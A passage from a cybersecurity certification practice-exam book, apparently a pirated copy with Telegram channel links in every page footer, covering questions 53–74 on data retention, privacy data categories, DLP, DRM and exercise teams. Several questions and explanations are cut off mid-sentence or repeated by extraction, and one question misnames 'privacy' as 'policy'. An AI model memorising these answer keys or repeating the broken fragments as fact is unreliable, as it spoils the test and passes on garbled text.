cates information that is private or could potentially harm an in-
dividual should it be made public. This includes things like bio-
metric data, genetic information, sex, trade union membership,
sexual orientation, etc.

Intellectual property is incorrect. Intellectual property (IP) is a

term for any intangible asset — something proprietary that
doesn’t exist as a physical object but has value. Examples of
intellectual property include designs, concepts, software, in-
ventions, trade secrets, formulas, and brand names, as well as
works of art. Intellectual property can be protected by copy-
right, trademark, patent, or other legal measures.
130
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 53. A company follows the data retention policy as it
is a framework of rules for holding, storing, and deleting the in-
formation it generates. The company’s policy states the ac-
counting-related data is stored for a period of 3 years before
the permanent deletion. Which of the following process does
the company follow to destroy the data?
(A) Sanitization
(B) Secure disposal
(C) Patching
(D) Downtime

Explanation 53. Sanitization is the correct answer. Data

sanitization is the process of deliberately, permanently, and ir-
reversibly removing or destroying the data stored on a memory
device to make it unrecoverable. A device that has been sani-
tized has no usable residual data, and even with the assistance
of advanced forensic tools, the data will not ever be recovered.

Secure disposal is incorrect. Secure data disposal includes

securely disposing of data from a device, but not getting rid of
the data entirely. When you dispose of data (i.e. putting it in the
trash or simply deleting files off of your computer), the data can
still be accessed by individuals.

131
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Patching is incorrect. Patches are software and operating
system (OS) updates that address security vulnerabilities within
a program or product.

Downtime is incorrect. Downtime or outage duration refers to

a period of time that a system fails to provide or perform its
primary function.

Question 54. Wireshark is a command-line utility that allows

you to capture and analyze network traffic going through your
system. It is often used to help troubleshoot network issues, as
well as a security tool. (TRUE/FALSE)
(A) TRUE
(B) FALSE

Explanation 54. The correct answer is FALSE. Wireshark is

indeed a tool that captures and analyzes network traffic that
goes through your system but is not a command-line utility.

Wireshark is the world’s leading network traffic analyzer and an

essential tool for any security professional or systems adminis-
trator. It lets you analyze network traffic in real-time, and is of-
ten the best tool for troubleshooting issues on your network.

132
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Tcpdump is a command-line utility that allows you to capture
and analyze network traffic going through your system. It is of-
ten used to help troubleshoot network issues, as well as a se-
curity tool.

Question 55. You have been hired to investigate an activity

from an attacker who compromised a host on the company’s
network. The attacker used credentials from an employee to
breach the system. After a while, he gained access to a Linux
server and he started using sudo commands to perform mali-
cious activities. What sort of attack the attacker used?
(A) Pharming
(B) Authentication Hijacking
(C) Injection Attacks
(D) Privilege escalation

Explanation 55. Privilege escalation is the correct

The attacker can then use the newly gained privileges to steal
confidential data, run administrative commands or deploy mal-

133
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
ware – and potentially do serious damage to your operating
system, server applications, organization, and reputation.

Pharming is incorrect. Pharming is a cyberattack intended to

redirect a website’s traffic to another, fake site. Pharming can
be conducted either by changing the hosts file on a victim’s
computer or by exploitation of a vulnerability in the DNS server.

Authentication Hijacking is incorrect as attackers attempt to

bypass or break the authentication methods that a web appli-
cation is using.

Injection Attacks is incorrect as injection attacks occur when

malicious code is embedded into unsecured software.

Question 56. Which of the following process describes how

134
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Explanation 56. Retention policy is the correct answer. A
retention policy is a key part of the lifecycle of a record. It de-
scribes how long a business needs to keep a piece of informa-
tion (a record), where it’s stored, and how to dispose of the
record when its time.

Business continuity plan is incorrect. Business continuity

planning is a strategy. It ensures continuity of operations with
minimal service outage or downtime. It is designed to protect
personnel or assets and make sure they can function quickly
when a disaster strikes such as natural disasters or cyber-at-
tacks.

Disaster recovery plan is incorrect. A business disaster re-

covery plan can restore data and critical applications in the
event your systems are destroyed when disaster strikes.

The difference between a business continuity plan and a

disaster recovery plan is:
A business continuity plan is a strategy businesses put in place
to continue operating with minimal disruption in the event of a
disaster. The disaster recovery plan refers more specifically to
the steps and technologies for recovering from a disruptive
event, especially as it pertains to restoring lost data, in-
frastructure failure, or other technological components.

135
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Incident response team is incorrect. An incident response
team is a group of IT professionals in charge of preparing for
and reacting to any type of organizational emergency. Respon-
sibilities of an incident response team include developing an in-
cident response plan, testing for and resolving system vulnera-
bilities, maintaining strong security best practices, and provid-
ing support for all incident handling measures.

Question 57. An information system which is so critical to an

organization that in case of corruption or loss of access to it
would have a serious impact on the organization’s ability to
conduct business is known as?
(A) High-Value Asset
(B) Data exfiltration
(C) Legal hold
(D) Security procedure

Explanation 57. High-Value Asset is the correct answer. A

High-Value Asset (HVA) is information or an information system
that is so critical to an organization that the loss or corruption of
this information or loss of access to the system would have a
serious impact on the organization’s ability to perform its mis-
sion or conduct business.

136
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Data exfiltration is incorrect. Data exfiltration is a form of a
security breach that occurs when an individual’s or company’s
data is copied, transferred, or retrieved from a computer or
server without authorization.

Legal hold is incorrect. A legal hold (also known as a litigation

hold) is a notification sent from an organization’s legal team to
employees instructing them not to delete electronically stored
information (ESI) or discard paper documents that may be rele-
vant to a new or imminent legal case.

Security procedure is incorrect. A security procedure is a set

sequence of necessary activities that performs a specific secu-
rity task or function. Procedures are normally designed as a se-
ries of steps to be followed as a consistent and repetitive ap-
proach or cycle to accomplish an end result.

Question 58. Which of the following categories would contain

137
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Explanation 58. Sensitive Personal Information is the cor-
rect answer. Sensitive Personal Information (SPI) refers to in-
formation that does not identify an individual, but is related to
an individual, and communicates information that is private or
could potentially harm an individual should it be made public.
This includes things like biometric data, genetic information,
sex, trade union membership, sexual orientation, etc.

Personally identifiable information is incorrect. Personally

identifiable information (PII) is any data that can be used to
identify a specific individual. Social Security numbers, mailing
or email addresses, and phone numbers have most commonly
been considered PII, but technology has expanded the scope
of PII considerably. It can include an IP address, login IDs, social
media posts, or digital images. Geolocation, biometric, and be-
havioral data can also be classified as PII.

Protected health information is incorrect. Protected health

138
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Intellectual property is incorrect. Intellectual property (IP) is a
term for any intangible asset — something proprietary that
doesn’t exist as a physical object but has value. Examples of
intellectual property include designs, concepts, software, in-
ventions, trade secrets, formulas, and brand names, as well as
works of art. Intellectual property can be protected by copy-
right, trademark, patent, or other legal measures.

Question 59. One station on the network notifies the other

station on the network in a ring fashion when they are not re-
ceiving the transmission signals with the aim of self-repairing
network problems. This process is known as?
(A) Beaconing
(B) Data loss prevention
(C) Βlacklisting
(D) Whitelisting

Explanation 59. Beaconing is the correct answer. In wireless

networks, a beacon is a type of frame that is sent by the access
point (or WiFi router) to indicate that it is on.

Bluetooth based beacons periodically send out a data packet

and this could be used by software to identify the beacon loca-

139
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
tion. This is typically used by indoor navigation and positioning
applications.

Beaconing is the process that allows a network to self-repair

network problems. The stations on the network notify the other
stations on the ring when they are not receiving the transmis-
sions. Beaconing is used in the Token ring and FDDI networks.

Data loss prevention is incorrect. Data loss prevention (DLP)

is a set of tools and processes used to ensure that sensitive
data is not lost, misused, or accessed by unauthorized users.

Blacklisting is incorrect. Blacklisting means accepting most

entities, but excluding those you believe to be malicious or oth-
erwise wish to avoid. Traditionally, blacklisting has been the
most common approach security teams use for securing their
networks or environments.

Whitelisting is incorrect. Whitelisting refers to the practice of

blocking all entities except those that are explicitly allowed to
communicate with you or your infrastructure. Whitelisting
makes more sense in situations where you do not want a ser-
vice to be public.

140
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 60. The IT team of a company has just implemented
a bandwidth monitoring solution to identify alarming and sud-
den network spikes in their network traffic. What might be the
cause of the unusual network spikes in their network? (Choose
all that apply.)
(A) Remote backup tools
(B) Malware outbreaks
(C) DNS server issues
(D) Mail server problems
(E) WiFi interference

Explanation 60. The correct answers are:

1. Remote backup tools
2. Malware outbreaks
3. Mail server problems
There are many different causes of sudden network spikes, and
you should find the root cause of any unusual bandwidth us-
age.

Remote Backup Tools

What applies to backups inside the LAN especially does for
remote ones. Many networks use cloud-based solutions for
safeguarding their data – in most cases complementary to local
backups. Uploading huge amounts of data stresses the band-
width.

141
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Malware outbreaks
If your traffic rises for no apparent reason, it might be a hacking
attempt. Heavy cases like DDoS attacks are usually detected
very quickly due to their strong and immediate impact. More
subtle attacks are a bit more difficult to reveal. By observing
your bandwidth monitor, you can spot potential malware out-
breaks or hacking attempts.

Mail Server Problems

Delivering and receiving mails is one of the most frequent tasks
your network has to handle. Simple text-only emails or mes-
sages with small attachments usually don’t stress the network
much, even in large numbers. But if anything goes wrong with
the mail delivery, many mail servers are very persistent in trying
to send out the messages over and over again.

142
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 61. A cybersecurity analyst follows an incident re-
sponse plan to remediate a threat. Which of the following ac-
tions the analyst should perform NEXT as part of the recovery
process after eradicating the malware from the victimized sys-
tem?
(A) Reconstitution of resources
(B) Restoration of capabilities and services
(C) Restoration of permissions
(D) Verification of logging

Explanation 61. Restoration of permissions is the correct

answer. An incident response plan ensures that in the event of
a security breach, the right personnel and procedures are in
place to effectively deal with a threat. Having an incident re-
sponse plan in place ensures that a structured investigation can
take place to provide a targeted response to contain and reme-
diate the threat.

Following an incident, all types of permissions should be re-

viewed and reinforced. This especially affects file and firewall
ACLs and system privileges assigned to administrative user or
group accounts. This is performed during the recovery process/
phase.

143
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 62. Which of the following categories would contain
information about an individual’s demographic information,
medical histories, laboratory results, and mental health condi-
tions?
(A) Personally identifiable information
(B) Personal health information
(C) Sensitive personal information
(D) Intellectual property

Explanation 62. Personal health information is the correct

answer. Protected health information (PHI), also referred to as
personal health information, generally refers to demographic in-
formation, medical histories, test and laboratory results, mental
health conditions, insurance information, and other data that a
healthcare professional collects to identify an individual and
determine appropriate care.

Personally identifiable information is incorrect. Personally

144
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Sensitive Personal Information is incorrect. Sensitive Per-
sonal Information (SPI) refers to information that does not iden-
tify an individual, but is related to an individual, and communi-
cates information that is private or could potentially harm an in-
dividual should it be made public. This includes things like bio-
metric data, genetic information, sex, trade union membership,
sexual orientation, etc.

Intellectual property is incorrect. Intellectual property (IP) is a

145
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 63. Your company is using Wireshark as a network
protocol analyzer. The workstation with an IP address of
192.168.0.6 consumes too much bandwidth from the network
without an obvious reason. Which of the following display filters
should you use to display packets to or from the IP address
192.168.0.6?
(A) ip.addr=192.168.0.6
(B) ip.dst==192.168.0.6
(C) ip.addr==192.168.0.6
(D) ip.src==192.168.0.6

Explanation 63. ip.addr==192.168.0.6 is the correct an-

swer. Wireshark provides a display filter language that enables
you to precisely control which packets are displayed. They can
be used to check for the presence of a protocol or field, the
value of a field, or even compare two fields to each other.
These comparisons can be combined with logical operators,
like “and” and “or”, and parentheses into complex expressions.

You can build display filters that compare values using a num-
ber of different comparison operators. For example, to only dis-
play packets to or from the IP address 192.168.0.6, use ip.ad-
dr==192.168.0.6.

146
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 64. The private IP range of the accounting depart-
ment is 192.168.0.5 – 192.168.0.10. The hosts with IP address
192.168.0.7 and 192.168.0.9 aren’t able to connect to examsdi-
gest.com by its domain name but only by its public IP address
(145.34.2.7). Which of the following tools should you use to
find out if these hosts have opened port 54?
(A) Sanitization
(B) Reverse engineering
(C) Sweep scan
(D) Endpoint detection and response

Explanation 64. Sweep scan is the correct answer. A sweep

scan tries to find out which hosts in the network have opened a
specific port.

Sanitization is incorrect. Sanitizing will remove any illegal

character from the data.

Reverse engineering is incorrect. Reverse engineering can

be used to identify the details of a breach that how the attacker
entered the system, and what steps were taken to breach the
system.

Endpoint detection and response is incorrect. Endpoint de-

tection and response tools work by monitoring endpoint and
network events and recording the information in a central data-

147
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
base where further analysis, detection, investigation, reporting,
and alerting take place. A software agent installed on the host
system provides the foundation for event monitoring and re-
porting.

148
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 65. Your co-worker Marie sent you the following
screenshot. She states that each time she opens her worksta-
tion the usage of the RAM reaches 90% – 99% and the error
“Your computer is low on memory” popping up. Which of the
following might be the cause of high memory usage? (Choose
all that apply.)

(A) Insufficient disk space

(B) Network Interface Controller issues
(C) Startup programs
(D) A USB port is open
(E) Defective program design

149
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Explanation 65. The correct answers:
1. Insufficient disk space
2. Startup programs
3. Defective program design

Windows 10 high memory usage is usually related to RAM and

virtual memory. Although memory is tightly connected with
CPU and hard drive, the high memory usage problem still dif-
fers from high CPU usage and high disk usage problems.

If the computer has a high memory usage problem, it will freeze

(especially when a large program like a game is running).
Sometimes, it will result in “Your computer is low on memory”
error popping up.

The reasons that may cause high memory usage are various,
but the common causes are as follows.

- Running too many programs at the same time.

- Registry hack.
- Defective program design.
- Startup programs.
- Insufficient disk space.
- Virus or antivirus.
- Other causes.

150
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
CHAPTER 5
COMPLIANCE AND
ASSESSMENT

Questions 66-75

151
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 66. Which of the following statements describe the
difference between security and policy?
(A) Security is about the safeguarding of user identity,
whereas privacy is about the safeguarding of data
(B) Security is about the safeguarding of data and user
identity, whereas privacy is about the safeguarding of data
(C) Security is about the safeguarding of data, whereas pri-
vacy is about the safeguarding of user identity
(D) Security is about the safeguarding of data, whereas pri-
vacy is about the safeguarding of data and user identity

Question 67. A company signs up a new contract with an In-

ternet service provider (ISP). The ISP presents a document
which states that the company agrees to adhere to stipulations
such as:

Not using the service as part of violating

any law
Not attempting to break the security of any
computer network or user
Not posting commercial messages to Usenet
groups without prior permission
Not attempting to send junk e-mail or spam
to anyone who doesn't want to receive it
Not attempting to mail bomb a site with
mass amounts of e-mail in order to flood
their server
152
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Which of the following documents is described in the above
scenario?
(A) General Data Protection Regulation
(B) National Institute of Standards and Technology
(C) International Organization for Standardization
(D) Acceptable Use Policy

Question 68. A company collects information from customers

in all possible ways through the web. Afterwards, the company
separate the information based on demographics and interest
and resell the customer’s data to third-party companies in dif-
ferent countries. Which of the following concepts does the
company violate?
(A) Data masking
(B) Data enrichment
(C) Data sovereignty
(D) Data exfiltration

153
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 69. Your organization is working with a contractor to
build a database. You need to find a way to hide the actual data
from being exposed to the contractor. Which of the following
technique will you use in order to allow the contractor to test
the database environment without having access to actual
sensitive customer information?
(A) Data masking
(B) Tokenization
(C) Encryption
(D) Data at rest

Question 70. An author just published his new eBook on Ama-

zon but he worries about copyright issues as the previous
eBook was found on file-sharing websites. The author wants to
prevent users from sharing his content online. Which of the fol-
lowing tools allows the author to prevent unauthorized use of
his content?
(A) NDA
(B) DRM
(C) DLP
(D) AUP

154
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 71. A company hired an outside contractor to over-
see the cyber defense competition and adjudicate the event.
Which of the following cybersecurity testing exercise team
MOST likely been hired.
(A) Red team
(B) Blue team
(C) White team
(D) Purple team

Question 72. You have been hired as a penetration tester for

conducting an assessment. The company wants to include
ONLY cross-site scripting and SQL injection from the list of au-
thorized activities. Which of the following documents would in-
clude this limitation?
(A) Non-Disclosure Agreement
(B) Code of Conduct
(C) Rules of Engagement
(D) Acceptable Use Policy

155
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 73. If an employee tried to forward a business email
outside the corporate domain or upload a corporate file to a
consumer cloud storage service like Google drive, the employ-
ee would be denied permission. Which of the following process
is described in the above scenario?
(A) Non-disclosure Agreement
(B) Data Loss Prevention
(C) Digital Rights Management
(D) Tokenization

Question 74. Your agency has received various complaints

about slow Internet access and that your web site is inaccessi-
ble. After further investigation, it is determined that your agency
is a victim of a DNS amplification attack that is currently over-
whelming your DNS server and network bandwidth. An over-
whelmingly large number of Internet spoofed IP addresses are
involved in the attack. The above scenario can be considered a
tabletop exercise. (TRUE/FALSE)
(A) TRUE
(B) FALSE

156
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 75. Which of the following statements describes the
difference between the Red team and the Blue team in a cyber-
security testing exercise?
(A) A blue team imitates an attacker and attacks with char-
acteristic tactics and techniques while a red team is there to
find ways to defend the attack
(B) A red team imitates an attacker and attacks with charac-
teristic tactics and techniques while a blue team is there to find
ways to both defend and attack
(C) A red team imitates an attacker and attacks with charac-
teristic tactics and techniques while a blue team is there to find
ways to defend the attack
(D) A blue team imitates an attacker and attacks with char-
acteristic tactics and techniques while a red team is there to
find ways to both defend and attack

157
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Answers 66-75

Question 66. Which of the following statements describe the

difference between security and policy?
(A) Security is about the safeguarding of user identity,
whereas privacy is about the safeguarding of data
(B) Security is about the safeguarding of data and user
identity, whereas privacy is about the safeguarding of data
(C) Security is about the safeguarding of data, whereas pri-
vacy is about the safeguarding of user identity
(D) Security is about the safeguarding of data, whereas pri-
vacy is about the safeguarding of data and user identity

Explanation 66. Security is about the safeguarding of data,

whereas privacy is about the safeguarding of user identity
is the correct answer. Security refers to protection against the
unauthorized access of data. We put security controls in place
to limit who can access the information.

For example, hospital and clinic staff use secure systems to

communicate with patients about their health, instead of send-
ing information via personal email accounts. This type of data
transmission is an example of security. On the other hand, pri-
vacy provisions might limit patient health record access to spe-
cific hospital staff members, such as doctors, nurses, and
158
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
medical assistants. Privacy might also stipulate when users can
access specific information.

Question 67. A company signs up a new contract with an In-

ternet service provider (ISP). The ISP presents a document
which states that the company agrees to adhere to stipulations
such as:

Not using the service as part of violating

Which of the following documents is described in the above

scenario?
(A) General Data Protection Regulation
(B) National Institute of Standards and Technology
(C) International Organization for Standardization
(D) Acceptable Use Policy

159
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Explanation 67. Acceptable Use Policy is the correct an-
swer. An acceptable use policy (AUP) is a document stipulat-
ing constraints and practices that a user must agree to for ac-
cess to a corporate network or the Internet.

General Data Protection Regulation is incorrect. General

Data Protection Regulation (GDPR) is a set of rules designed to
give EU citizens more control over their personal data. It aims to
simplify the regulatory environment for business so both citi-
zens and businesses in the European Union can fully benefit
from the digital economy.

Under the terms of GDPR, not only do organizations have to

ensure that personal data is gathered legally and under strict
conditions, but those who collect and manage it are obliged to
protect it from misuse and exploitation, as well as to respect the
rights of data owners – or face penalties for not doing so.

National Institute of Standards and Technology is incor-

rect. National Institute of Standards and Technology’s (NIST)
mission is to promote U.S. innovation and industrial competi-
tiveness by advancing measurement science, standards, and
technology in ways that enhance economic security and im-
prove the quality of life.

160
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
International Organization for Standardization is
incorrect. International Organization for Standardization ISO
develops and publishes standards for a vast range of products,
materials, and processes. The organization’s standards catalog
is divided into 97 fields which include healthcare technology,
railway engineering, jewelry, clothing, metallurgy, weapons,
paint, civil engineering, agriculture, and aircraft.

Question 68. A company collects information from customers

Explanation 68. Data sovereignty is the correct

answer. Data sovereignty is the concept that information that
has been converted and stored in binary digital form is subject
to the laws of the country in which it is located.

161
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Data sovereignty comes into play when an organization’s data
is stored outside of their country and is subject to the laws of
the country in which the data resides. The main concern with
data sovereignty is maintaining privacy regulations and keeping
foreign countries from being able to subpoena data.

Data masking is incorrect. Data masking is a method of cre-

ating a structurally similar but inauthentic version of an organi-
zation’s data that can be used for purposes such as software
testing and user training. The purpose is to protect the actual
data while having a functional substitute for occasions when
the real data is not required.

Overall, the primary function of masking data is to protect sen-

sitive, private information in situations where it might be visible
to someone without clearance to the information.

Data enrichment is incorrect. Data enrichment is the process

of combining first-party data from internal sources with dis-
parate data from other internal systems or third-party data from
external sources. Enriched data is a valuable asset for any or-
ganization because it becomes more useful and insightful.

Data exfiltration is incorrect. Data exfiltration is a form of a

security breach that occurs when an individual’s or company’s

162
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
data is copied, transferred, or retrieved from a computer or
server without authorization.

Question 69. Your organization is working with a contractor to

build a database. You need to find a way to hide the actual data
from being exposed to the contractor. Which of the following
technique will you use in order to allow the contractor to test
the database environment without having access to actual
sensitive customer information?
(A) Data masking
(B) Tokenization
(C) Encryption
(D) Data at rest

Explanation 69. Data masking is the correct answer. Data

masking is a method of creating a structurally similar but inau-
thentic version of an organization’s data that can be used for
purposes such as software testing and user training. The pur-
pose is to protect the actual data while having a functional sub-
stitute for occasions when the real data is not required.

Overall, the primary function of masking data is to protect sen-

sitive, private information in situations where it might be visible
to someone without clearance to the information.

163
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Tokenization is incorrect. Tokenization is the process of turn-
ing a meaningful piece of data, such as an account number,
into a random string of characters called a token that has no
meaningful value if breached. Tokens serve as a reference to
the original data, but cannot be used to guess those values.
That’s because, unlike encryption, tokenization does not use a
mathematical process to transform sensitive information into
the token.

There is no key or algorithm, that can be used to derive the

original data for a token. Instead, tokenization uses a database,
called a token vault, which stores the relationship between the
sensitive value and the token. The real data in the vault is then
secured, often via encryption.

Encryption is incorrect. Encryption is the process of using an

algorithm to transform plain text information into a non-read-
able form called ciphertext. An algorithm and an encryption key
are required to decrypt the information and return it to its origi-
nal plain text format. Today, SSL encryption is commonly used
to protect information as it’s transmitted on the Internet.

Data at rest is incorrect. Data at rest is data that is not actively

moving from device to device or network to network such as
data stored on a hard drive, laptop, flash drive, or archived/
stored in some other way. Data protection at rest aims to secure
164
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
inactive data stored on any device or network. While data at
rest is sometimes considered to be less vulnerable than data in
transit, attackers often find data at rest a more valuable target
than data in motion.

Question 70. An author just published his new eBook on Ama-

Explanation 70. DRM is the correct answer. Digital rights

management (DRM) is a way to protect copyrights for digital
media. This approach includes the use of technologies that lim-
it the copying and use of copyrighted works and proprietary
software. In a way, digital rights management allows publishers
or authors to control what paying users can do with their works.

165
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Publishers, authors, and other content creators use an applica-
tion that encrypts media, data, e-book, content, software, or
any other copyrighted material. Only those with the decryption
keys can access the material. They can also use tools to limit or
restrict what users are able to do with their materials.

There are many ways to protect your content, software, or

product. DRM allows you to:
- Restrict or prevent users from editing or saving your content.
- Restrict or prevent users from sharing or forwarding your
product or content.
- Restrict or prevent users from printing your content. For some,
the document or artwork may only be printed up to a limited
number of times.

NDA is incorrect. A Non-Disclosure Agreement (NDA) is a

legally enforceable contract that establishes confidentiality be-
tween two parties—the owner of protected information and the
recipient of that information. By signing an NDA, participants
agree to protect confidential information shared with them by
the other party.

DLP is incorrect. Data Loss Prevention (DLP) makes sure that

users do not send sensitive or critical information outside the
corporate network. The term describes software products that

166
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
help a network administrator control the data that users can
transfer.

AUP is incorrect. An acceptable use policy (AUP), acceptable

usage policy, or fair use policy, is a set of rules applied by the
owner, creator, or administrator of a network, website, or ser-
vice, that restrict the ways in which the network, website or
system may be used and sets guidelines as to how it should be
used.

Question 71. A company hired an outside contractor to over-

see the cyber defense competition and adjudicate the event.
Which of the following cybersecurity testing exercise team
MOST likely been hired.
(A) Red team
(B) Blue team
(C) White team
(D) Purple team

Explanation 71. White team is the correct answer. White

team oversees the cyber defense competition and adjudicates
the event. They are also responsible for recording scores for the
Blue Teams given by the Red Team on usability and security,

167
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
respectively. The White Team also reads the security reports
and scores them for accuracy and countermeasures.

Red team is incorrect. Red Teams are the attackers. While not
strictly required, Red Teams are usually outside contractors –
since the best testing is done by a team with a lot of knowledge
of how to break in, but no knowledge of what security is already
in place. Knowing what security is being used can lead to some
attacks being automatically avoided because there is security
in place – which can lead to vulnerabilities being missed if that
security isn’t properly configured.

Blue team is incorrect. Blue teams are the defenders. Blue

Teams have two major areas of operations. They continually at-
tempt to harden security around and within the company’s data
systems and networks – even when no testing is going on.
They can also act as an active part of the defensive systems
when the Red Team is attacking.

Purple Team is incorrect. Purple Teams are a single group of

people who do both Red and Blue testing and securing of a
company. They may be a consulting group brought in for an
audit, or employees of the company directly, but they do not
focus exclusively on attacking or defending – they do both.
Purple Teams are effective for spot-checking systems in larger

168
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
organizations as well, but it is generally best to have opposing
and independent teams whenever possible.

Question 72. You have been hired as a penetration tester for

Explanation 72. Rules of Engagement is the correct an-

swer. The Rules of Engagement, or ROE, are meant to list out
the specifics of your penetration testing project to ensure that
both the client and the engineers working on a project know
exactly what is being tested when it’s being tested, and how it’s
being tested.

Non-Disclosure Agreement (NDA) is incorrect. A Non-Dis-

closure Agreement (NDA) is a legally enforceable contract that
establishes confidentiality between two parties—the owner of
protected information and the recipient of that information. By

169
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
signing an NDA, participants agree to protect confidential in-
formation shared with them by the other party.

Code of Conduct is incorrect. A code of conduct defines how

a company’s employees should act on a day-to-day basis. It
reflects the organization’s daily operations, core values, and
overall company culture. As a result, every code of conduct is
unique to the organization it represents.

Acceptable Use Policy is incorrect. An acceptable use policy

(AUP), acceptable usage policy, or fair use policy, is a set of
rules applied by the owner, creator, or administrator of a net-
work, website, or service, that restrict the ways in which the
network, website or system may be used and sets guidelines
as to how it should be used.

170
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 73. If an employee tried to forward a business email
outside the corporate domain or upload a corporate file to a
consumer cloud storage service like Google drive, the employ-
ee would be denied permission. Which of the following process
is described in the above scenario?
(A) Non-disclosure Agreement
(B) Data Loss Prevention
(C) Digital Rights Management
(D) Tokenization

Explanation 73. Data Loss Prevention (DLP) is the correct

answer. Data Loss Prevention (DLP) makes sure that users do
not send sensitive or critical information outside the corporate
network. The term describes software products that help a
network administrator control the data that users can transfer.

DLP products use business rules to classify and protect confi-

dential and critical information so that unauthorized users can-
not accidentally or maliciously share data, which would put the
organization at risk.

Non-Disclosure Agreement (NDA) is incorrect. A Non-Dis-

closure Agreement (NDA) is a legally enforceable contract that
establishes confidentiality between two parties—the owner of
protected information and the recipient of that information. By

171
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
signing an NDA, participants agree to protect confidential in-
formation shared with them by the other party.

Digital Rights Management (DRM) is incorrect. Digital Rights

Management (DRM) is a systematic approach to copyright pro-
tection for digital media. The purpose of DRM is to prevent
unauthorized redistribution of digital media and restrict the
ways consumers can copy content they’ve purchased.

Tokenization is incorrect. Tokenization is the process of turn-

ing a meaningful piece of data, such as an account number,
into a random string of characters called a token that has no
meaningful value if breached. Tokens serve as a reference to
the original data, but cannot be used to guess those values.
That’s because, unlike encryption, tokenization does not use a
mathematical process to transform sensitive information into
the token.

There is no key or algorithm, that can be used to derive the

172
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 74. Your agency has received various complaints
about slow Internet access and that your web site is inaccessi-
